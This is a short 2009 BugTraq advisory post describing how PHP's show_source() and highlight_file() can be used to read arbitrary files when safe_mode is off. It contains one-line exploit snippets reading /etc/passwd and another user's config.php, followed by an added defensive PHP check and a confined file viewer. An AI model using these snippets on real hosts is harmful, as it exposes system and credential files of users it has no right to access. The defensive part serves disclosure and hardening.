BugTraq
php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass Jan 04 2009 07:39PM
l1un hotmail com
Author: Super-Crystal

www.arab4services.net

safe_mode off (tested)

<?

show_source ('/etc/passwd');

?>

Example exploit:

<?

show_source ('/home/user/public_html/config.php');

?>

-----------------------------

highlight_file()

<?

highlight_file ("/etc/passwd");

?>

exploit !!!

<...
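
A defender-side check for the behaviour shown in the post, added here as an example and not part of the original message: it reports whether the runtime leaves show_source()/highlight_file() unrestricted and shows a source viewer confined to one directory tree. The function names are hypothetical and the code assumes PHP 7.1 or later run from the CLI.

```php
<?php
// Added example, not code from the post. Function names are hypothetical.
// Assumes PHP 7.1+ run from the CLI.

// Report php.ini settings that leave show_source()/highlight_file() unrestricted.
function source_viewer_exposure(): array
{
    $findings = [];
    // disable_functions is a comma-separated list set in php.ini.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['show_source', 'highlight_file'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn() is callable (not in disable_functions)";
        }
    }
    // open_basedir confines PHP file access to the listed directory trees.
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset: only OS file permissions limit reads';
    }
    return $findings;
}

// Source viewer confined to one directory tree; rejects anything outside it.
function highlight_within(string $baseDir, string $requested): string
{
    $base = realpath($baseDir);
    $path = realpath($requested);   // resolves symlinks and ".." segments
    if ($base === false || $path === false) {
        throw new RuntimeException('path does not exist');
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("refused: $path is outside $base");
    }
    $html = highlight_file($path, true);   // second argument: return, don't print
    if ($html === false) {
        throw new RuntimeException('could not read file');
    }
    return $html;
}

foreach (source_viewer_exposure() as $finding) {
    echo "[!] $finding\n";
}
try {
    // Constructed input: the path from the post, requested through the confined viewer.
    highlight_within(__DIR__, '/etc/passwd');
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```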

Copyright 2009, SecurityFocus